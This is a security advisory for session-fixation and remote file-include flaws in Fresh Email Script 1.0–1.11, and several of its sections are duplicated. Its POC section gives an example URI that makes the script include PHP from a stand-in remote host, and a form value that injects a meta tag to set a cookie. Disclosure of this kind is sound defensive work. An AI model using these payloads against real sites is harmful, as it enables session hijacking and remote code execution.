FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
BID:32241
Info
FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
| Bugtraq ID: | 32241 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7042 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 10 2008 12:00AM |
| Updated: | Apr 16 2015 05:51PM |
| Credit: | Don |
| Vulnerable: |
FreshScripts Fresh Email Script 1.11 FreshScripts Fresh Email Script 1.0 |
| Not Vulnerable: | |
Discussion
FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
FreshScripts Fresh Email Script is prone to multiple vulnerabilities, including a session-fixation vulnerability and a remote file-include vulnerability.
An attacker may leverage the session-fixation issue to hijack an unsuspecting user's session. The attacker may exploit the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
These issues affect Fresh Email Script 1.0 to 1.11; other versions may also be affected.
FreshScripts Fresh Email Script is prone to multiple vulnerabilities, including a session-fixation vulnerability and a remote file-include vulnerability.
An attacker may leverage the session-fixation issue to hijack an unsuspecting user's session. The attacker may exploit the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
These issues affect Fresh Email Script 1.0 to 1.11; other versions may also be affected.
Exploit / POC
FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
To exploit the session-fixation issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com/url.php?tmp_sid=http://www.example2.com/exploit
The following example cookie is available:
Email=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&[email protected]&register=Register
To exploit the session-fixation issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URI is available:
http://www.example.com/url.php?tmp_sid=http://www.example2.com/exploit
The following example cookie is available:
Email=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&[email protected]&register=Register
Solution / Fix
FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
FreshScripts Fresh Email Script Session Fixation and Remote File Include Vulnerabilities
References:
References:
- Fresh Email Script Homepage (FreshScripts)